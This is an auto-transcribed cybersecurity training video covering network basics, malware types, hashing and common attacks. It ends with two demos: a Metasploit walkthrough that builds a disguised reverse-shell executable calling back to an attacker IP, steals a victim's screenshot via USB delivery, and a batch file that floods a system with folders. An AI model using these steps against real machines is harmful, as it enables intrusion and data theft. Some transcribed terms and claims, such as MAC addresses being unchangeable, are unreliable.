hello my name is sargerai and on behalf of simply learn i'd like to welcome you to this tutorial on cyber security training let's first understand what is cyber security cyber security is the process of using best practices to protect systems network and programs from cyber attacks a good place to start the discussion is by understanding the motives of the cyber criminals why do cyber criminals attack in this example this vault contains some valuable money and the second vault also contains some money now let us secure the vault b with a lock now between these two vaults which one do you think is the cyber criminal likely to attack well most definitely vault a which is unlocked the cyber criminal would need to put in lesser effort to attack this unlocked vault let's look at another example now this time vault a is secured with a lock which will now take 5 minutes to unlock and similarly vault b is also secured with the lock and this will take 15 minutes to unlock now again between these two vaults which one is the cyber criminal likely to attack well most definitely vault a again as it will take less time to unlock this vault in this third scenario vault a has 1 million dollars and vault b has 10 million dollars now between these two vaults which one is the cyber criminal most likely to attack well this time the cyber criminal will definitely attack vault b which contains more money now that we've looked at some examples let's take a look at what's in it for you in this tutorial first we'll understand the concept of cyber security next we'll discuss the basic terminologies used in cyber security we'll discuss how the internet works and the basic protocols used on the internet understanding common types of attacks is very important for you to be able to protect against them and lastly we'll discuss about malwares its functions and its sources well i'm sure you're aware of the buzzword cyber security but let's understand what cyber security means cyber security is the technology and process of using industry best practices to protect systems network and programs from cyber attacks cyber security attacks are usually aimed at accessing changing or destroying sensitive data extending money from users or interrupting normal business processes everyone relies on critical infrastructure like power plants hospitals public transport system and financial service companies securing these and other organizations is essential to keeping our society functioning some people tend to confuse cyber security with information security they're actually different their capabilities are different information security is another way of saying data security in other words protecting the confidentiality integrity and availability of data this involves the protection of information and information systems from unauthorized access use disclosure disruption modification or destruction information security deals with the protection of information even if it's stored in a file cabinet while on the other hand cyber security deals with protecting data and information from outside sources in cyberspace or the internet so someone could likely be a cyber security expert without being an information security expert or vice versa here are some of the basic terminologies that you need to be aware of in the world of cyber security they are network internet internet protocols ip address mac address dns dhcp router malware virus warms bots and finally hash function and values we will be discussing these points in detail in the upcoming topics let's start the discussion with uh understanding what the network is a computer network is a group of two or more computers connected together so that they can communicate and share data with each other for example there are two computers exchanging data between them and in this example there are four computers connected to each other these computers in the network could be sharing resources like a printer or a file server a cyber security attack would most likely involve the use of this computer network the most common resource shared today is connection to the internet now the internet is a global system of interconnected computer networks that use the internet protocol suite which is the tcp ip to link devices worldwide via dedicated routers and servers when two computers are connected over the internet they can send and receive all kinds of fast range of information resources and services such as the world wide web email telephony video and file sharing cyber security primarily deals with attacks originating from the internet when two computers are communicating with each other over the internet they need to be able to understand each other and speak the same language the data that is being transferred or received cannot just follow any path to control the flow of data and connectivity there are a set of rules which are used which are known as internet protocols the protocol used on the internet is commonly known as tcpip because the foundational protocols in the suite are the transmission control protocol which is the tcp and the internet protocol which is the ip another important concept to understand is the ip address an internet protocol address or the ip address is a unique logical address assigned to each device connected to a computer network that uses the internet protocol for communication this unique address is designed to allow one connected computer to communicate with another device over the ip based network like the internet most ip address looks like this 168.194.64.10 an ip address provides an identity to a network device on the internet similar to a homework business address that supplies a specific physical location with an identifiable address devices in the network are differentiated from each other through this ip addresses similar to an ip address is the mac address which is a unique hardware identification number that is given to every device that connects on a network the media access control or the mac addresses are generally assigned by the vendor or the manufacturer of every network card such as the ethernet card or the wifi card unlike ip addresses a mac address is permanent and therefore cannot be changed mac address is generally 48 bits and written as 12-digit hexadecimal notation most mac addresses look like this d8 fc 93 c5 a5 e0 this unique mac address is used to identify the unique device so that data can be delivered to this particular device the domain name system or the dns can be considered as the phone book of the internet we humans use domain names like google.com which is easy to remember however the computers only understand an ip address and does not understand a domain name this is where a dns server is used to translate a domain name to its corresponding ip address for example if you want to browse google.com type google.com in the browser url this request goes to a dns server the dns server finds the ip address of google.com the dns server sends the ip address back to the computer and the computer connects to google.com using the ip address there are several attacks on the dna system a dns poisoning attack is a type of cyber attack which involves spoofing dns entries which can result in a user being diverted from a legitimate server to a fraudulent one not many are aware of the dhcp protocol the dynamic host configuration protocol in short known as dhcp it is a management protocol that is used to automatically assign an ip address to any device so that they can communicate using the internet protocol dhcp automates and centrally manages these configurations rather than requiring network administrators to manually assign ip addresses to all network devices suppose there are these three computers that need ip addresses to communicate on the network the dhcp communicates with these computers and automatically assigns them with an ip address along with other network details such as a subnet mask information default gateway and dns address the first system is assigned the ip address of 10.0.0.1 the second system is assigned 10.0.0.2 and the third system is assigned 10.0.0.3 you need to be aware that there are several dhcp related attacks which include dhcp spoofing and dhcp starvation which can lead to availability issues one of the most important device that is used in the internet is the router well this router is a networking device that transmits data packets between different networks using a routing protocol a simple example of a router is the wifi router device that you probably use at home to connect to the internet your local devices can connect to the router and the router can route the traffic onto the internet making it possible for you to connect to the internet using your local systems router security is a top priority a security hole in the network can expose you to attackers and your organization at risk most routers provides enough security tools to harden your network against possible cyber attacks provided that you take the time to configure them to your advantage malware a malicious software is any program or file that is intentionally designed to disrupt or damage a computer system types of malware can include a wide range of concepts including virus ransomware worms trojans rootkits keyloggers adware spyware bots remote access trojan logic bombs and backdoors we will discuss some of these malwares in the upcoming topics a computer virus is a malware or a malicious program which is designed to spread from one system to another through self-replication and to perform any of the wide range of malicious activities the malicious activities performed by a virus include data deletion corruption alteration and exfiltration an example of a virus is the melissa virus which is first detected in 1999 it is a macro virus that was spread through email attachments the best countermeasure against viruses is an antivirus or anti-malware scanner that is updated regularly another form of malware that is closely related to a virus is a warm worms are self-contained applications that don't require a host file or hard drive to infect worms typically are focused on replication and distribution rather than on direct damage and destruction an example is a w32.alkra.f which is a warm that attempts to propagate through various p2p file sharing networks such as limewire worms are designed to exploit a specific vulnerability in a system such as operating system protocol service or application and then use that flaw to spread themselves to other systems with the same flaw they may be used to deposit viruses logic bombs ransomware back doors or bots for botnets or they may perform direct virus-like activities on their own counter-images for worms are the same as for viruses with the addition of keeping systems patched the term bots or botnet is a shortened form of the phrase robot network it is used to describe a malicious computer program that is used by a hacker to control your system remotely a botnet is a culmination of traditional dos attacks into a concept known as a distributed denial of service attack a botnet can be used to perform any type of malicious activity although they're most often used to perform distributed of denial flooding attacks botnets can be used to automatically send spam emails or to retrieve web pages or to change computer settings or perform any other malicious activity botnets are possible because most computers around the world are accessible over the internet and many of those computers have weak security the best defense against the botnet is to keep your systems patched and hardened hashing is a one-way cryptographic function that takes in an input of any length and produces a fixed size unique output known as a hash value a hash value serves as a unique code to detect when the original data source has been altered since the altered file will produce a different hash value password should never be stored in plain text we should use a hashing function to store passwords let's take an example to understand this instead of storing the password abc at 123 as plain text assault value is appended to the plain text password and then the result is hashed this is referred to as the hashed value assault is randomly generated which is unique for each password both the salt value and the hashed value are stored together in this section we will discuss the common types of attacks which consists of distributed denial of service man in the middle attack email attacks and password attacks distributed denial of service is a type of attack where multiple compromise systems which are often infected with bots are used to target a single system causing a denial of service attack in this example the attacker prepares a botnet controller for the ddos attack the attacker uses this botnet controller to compromise the servers the botnet controller installs a malicious piece of software called bots in the compromise server these compromise servers can be referred to as zombie systems the attacker then remote controls these servers to attack a victim server in this example facebook.com this ddos attack is intended to temporarily or indefinitely disrupt the services of facebook.com now a legitimate user trying to access facebook.com is unable to do so since all of facebook's resources are used up in the ddos attack a man in the middle attack is a communications eavesdropping attack attackers position themselves in the communication stream between a client and server or any two communicating entities the client and server believe that they are communicating directly with each other they may even have secured on encrypted communication links however the attacker can access and potentially modify the communications one of the most common targets of man in the middle attack is an online banking site in this example a bank customer is communicating with the bank an attacker sits between the connection of two parties and observes the traffic the hacker first creates a connection with the customer and then creates a connection with the bank notice how both the bank and customer assume that the system they are talking to is the legitimate system the man in the middle appears to be the bank to the customer and it appears to be the customer to the bank in this banking scenario the hacker could steal the card information or see that a user is making a transfer and change the destination account number or amount being sent counter measures to man in the middle attacks include strong encryption protocols and the use of strong authentication the combination of username and password is the most common identification and authentication system at the same time they are the weakest form reliance solely on password is in true security the strength of a password is generally measured in the amount of time and effort involved in breaking the password through various forms of attacks password guessing attacks because of an easy to guess password is very common against websites and web servers some of the common types of password attacks are dictionary attack brute force attack key logger shoulder surfing and rainbow table attack let's understand these attacks in the upcoming topics a dictionary attack performs password guessing by using a pre-existing list of possible passwords password lists can include millions of possible passwords often password lists or dictionaries are constructed around topics thus if an attacker knows basic information about you as a person they can attempt to exploit human nature's tendency to select passwords using words common are familiar to you for example if an attacker knows that you work in the automobile industry you have dogs and you enjoy traveling they can select password dictionaries that include words acronyms and phases common to those subjects dictionary attacks are relatively fast operations but they have a low rate of success against targets with the knowledge of password security or whose systems enforce reasonable levels of password length and complexity a brute force attack is designed to try every possible valid combinations of characters to construct possible passwords starting with single characters and adding characters as a churns to the process in an attempt to discover a specific password used by the user account such attacks are always successful given enough time whereas simple and short passwords can be discovered amazingly quickly with a brute force approach longer and complex passwords can take a long period of time possibly into millions of years of computational time for complex passwords containing 16 or more characters a key logger is a form of malware that recalls the key strokes typed into the system's keyboard this is typically done covertly so that the person using the keyboard is unaware that their actions are being monitored the captured keystrokes are then uploaded to the attacker for analysis and exploitation keyloggers are most often used for stealing passwords and other confidential information many anti-malware scanners include signatures for keyloggers to detect these type of abusive software a keylogger infection might exhibit sluggish keyboard response require typing keys twice to get them to be recognized by the system and cause overall system performance degradation shoulder surfing occurs when someone is able to literally watch over a user's shoulder to view the keyboard or view their display this could allow them to learn a password or see information that is confidential private or simply not for their eyes this is especially effective in crowded places where a person uses a computer smartphone or atm often shoulder surfing is stopped by dividing worker groups by sensitivity levels using lock doors and they should not work on sensitive data while in public space such as coffee shop or on a plane privacy filter screen is also an effective solution to prevent shoulder surfing attack since the hashing algorithm is not reversible you might think it is impossible to break a hash however there are methods to do so rainbow table attacks are a type of attack that attempts to discover the password from the hash with the rainbow table all of the following hashes are computed in advance in other words you create a series of tables each has all the possible two letter three letter four letter and so forth combinations and the hash of the combination using a known hashing algorithm like md5 sha-1 etc now if you search a table for a given hash the letter combination in the table that produced the hash must be the password that you are seeking social engineering is a form of attack that exploits human nature and human behavior social engineering attacks take two primary forms convincing someone to perform an unauthorized operation or convincing someone to reveal confidential information for example the victim may be fooled into believing that a person on the phone is someone to be respected and trusted such as a trusted i.t professional in just about every case in social engineering the attacker tries to convince the victim to perform some activity or reveal a piece of information that they shouldn't such as their password the result of a successful attack is information leakage or the attacker being granted logical or physical access to a secure environment email or electronic mail is the most common method of exchanging digital messages on the internet the first email was sent in 1971 when a computer engineer used the at symbol to designate the recipient of the email at its core an email is simply a text message from one user to another advancing technology has added extra features along the way of course like image and file attachments links and embedded maps when you send and receive email you use an email client which allows you to compose and read emails from other computer users your email client can be web-based meaning you check it through a web browser example include gmail office 365 zoho or it can be an application on your computer like outlook and thunderbird when john sends an email to jack it appears that the email is sent directly from john's system to jack's system however that is not how email really works it is much more complex than that this is how an email really works it involves several mail servers along with dns servers after john's smtp client establishes a reliable communication channels to the smtp server the session is opened with a greeting by the server usually containing its fully qualified domain name in this case smtp.source.com the mail server approaches the dns server to resolve the mx record the dns server replies with the resolve ib address of the destination server the source mail server is now able to establish a reliable communication with the destination smtp mail server and now jack is able to receive the email in his email client using the pop3 or imap protocols let's understand the type of email attacks phishing is one of the most common attacks and spoofing and email attachments let's understand these attacks in a little more detail phishing is a form of social engineering attack focused on stealing credentials or identity information from any potential target it is based on the concept of phishing for information phishing attack is used to obtain sensitive information such as usernames passwords credit card details or other personally identifiable information by masquerading as a trustworthy entity for example a bank a service provider or a merchant phishing attack generally involves an email to encourage people to share their details in this example brian receives a fake email which mentions that his abc bank account was going to expire today creating a sense of urgency how does brian find out that it was a spam well brian does not have an abc bank account but what if someone actually had an account with abc bank it is quite likely that the person would click on the given link and become victim to the phishing attack well it is important to note that the banks do not send emails like this you should choose to ignore this email or report the matter to your bank immediately email spoofing refers to an email with the forged sender address to make it look as if it came from some legitimate user this is a common technique used by phishing attacks spam and malware to make their emails appear to be coming from legitimate sources such as governmental authorities insurance companies and banks in this example bill receives a spoofed email from his manager asking him to share his password well it is quite likely that bill may share his password if he's unaware of the email being spoofed as a good security practice never share your password on email or for that matter never ever share your password with anyone while email attachments are a convenient way to send files like images documents audios or videos it could be misused to share something which is malicious attackers might send you spoofed emails such as invoices encouraging you to download and open the file most malware email attachments include code or exploits to cause your computer to download more malware from the internet these email attachments are often small customized and not widely spread making them hard to detect by antivirus software in recent years email malwares is often used to drop a ransomware which can delete or encrypt your files and backups even if they are stored in the cloud or on a server malware or malicious code is any element of software that performs an unwanted function from the perspective of the legitimate user or owner of a computer system malware is big business not only are there hundreds of millions of malware families and variants in the world and an unknown number of programmers developing the malware there are also at least dozens of companies developing anti-malware solutions the developers who are working on writing malware are getting paid to write the software anticipating selling of this malware or expect to make money from the malware operations going through the different types of malware you will start to understand the complexity of the landscape today this includes the functions of malware as well as the users malwares have been known to overwhelm system resources a good example is that of a warm which is a self-contained application that typically are focused on replication and distribution rather than on direct damage and destruction it functions as a standalone piece of software in that it can spread without intervention by another program and it focuses on spreading from an infected system to as many unaffected systems as possible a warm infection may display symptoms that include a slow-to-response system applications that no longer will execute a lack of free space on storage devices cpu and memory utilization maxed out at 100 system crashes and abnormal network activity this results in a denial of service attack some malware can create back doors compromising the system's security a backdoor is a malware which allows a hacker to remotely access your system these small maliciously purposed tools can easily be deposited on a computer through a trojan horse a virus a warm a website mobile code download or even as part of an intrusion activity once active on a system the tool opens access ports and waits for an inbound connection thus a back door serves as an access portal for hackers so that they can bypass any security restrictions and gain access to a system for example microsoft has a back door which is used to update the patches periodically it is possible for an attacker to use this back door to attack the system remotely some malware such as retrovirus is known to disable security functions retroviruses are specifically targeted at antivirus systems to render them useless you can consider a retrovirus to be an anti antivirus retroviruses can directly attack your antivirus software and potentially destroy your virus definition database file destroying this information without your knowledge would leave you with a false sense of security the virus may also directly attack an antibiotic program to create bypass for itself as discussed earlier malwares can be used to create botnets for a ddos attack botnets are either directly or indirectly controlled by a hacker a botnet can be used to perform any type of malicious activity although they are most often used to perform denial of service flooding attacks botnets can send hundreds and millions of requests to a website causing the website to crash and not available for legitimate users the best defense against a botnet is to keep your systems patched and hardened and not to become the host of a botnet agent malwares are often copied from one location to another using various methods removable media such as usb pen drives are a major source of malware it is generally a good practice to disable the use of such removable media to not only protect against malwares but also against theft of confidential data documents and executable files can be used to spread malware across systems generally it's a good practice to not allow normal users the ability to install executable files in their system internet is the source for millions of malicious files that can be easily downloaded and can infect the systems a firewall rule should be configured to prevent the download of such malicious files several malwares such as warm can easily spread across network connection a system infected with warm must immediately be disconnected from the network to prevent it from infecting other systems in the network as discussed earlier email attachments could contain malicious links or files always be cautious of any attachments and scan them before downloading if the primary purpose of the malware application is to deliver ads then it is classified as adware the primary purpose of adware is to display malicious ads and generate revenue for the creator so malwares are designed to display popup over legitimate content these pop-ups could contain malicious links and some of them could contain phishing content which are difficult to detect as these new threats have developed so too have some excellent programs for countering them keep your updates current because this is where most of the corrections for security problems are implemented in this demo you will learn how to create and deploy a virus using the metasploit framework we will use the msf venom command available in kali linux to create a standalone binary that will create a reverse meta printer shell back to us the hyphen p option specifies the payload to use which in this demo is the windows meta printer mirror printer allows an attacker to control a victim's computer by running an invisible shell and establishing a communication channel back to the attacking machine l-host option should be used to specify your ip address which in this case is 192.168.41.129 output option should be the port you wish to be connected back on which in this case is double 444 hyphen f specifies the output format which in this case is exe hyphen a specifies the architecture to use save the file as setup.exe press enter give it a moment to generate the payload wonderful the exe file with the payload is now generated now let's run the msf console command this will start the mere exploit framework console use exploit multihandler to handle the exploit set payload windows medipera reverse tcp reverse tcp to get the signal from host set lhost ip address here you set your own ip address set l port as double 444 set any port that you want not the standard port like http uses port 80. exploit and wait for the victim to click on the setup file after this copy the virus folder into the pen drive and paste it into the windows then run the file on windows system and then you will see that the reverse tcp will get the details of the computer where the file was executed here are the commands ls lists the files on victim system pwd displays the current directory sysinfo gets the system information help gets all the commands related to the present directory timestamp commands password database command hashtag privilege element command getsystem here are the webcam commands to control your webcam these are the various options available back in the windows system open up some files this is bank credentials and your very sensitive passwords file the back in your kali linux type the screenshot command and this will save the screenshot on your system let's open the file and now you can see that the very sensitive file is now being displayed here in the screenshot i hope you enjoyed the demo this demo will show you to create unlimited new folder virus type this code on notepad this creates a infinite loop to create random folders and save it as bat file dot bad file means that it will execute in command prompt create a folder called documents and place the file.bat inside this folder now run the file where you want and it will start creating unlimited folders you can press shift she to terminate this command type y to terminate this batch job you can see that there are thousands of folders that have been created click on this folder and you can see that these folders are all empty hope you like the demo hi there if you like this video subscribe to the simply learn youtube channel and click here to watch similar videos to nerd up and get certified click here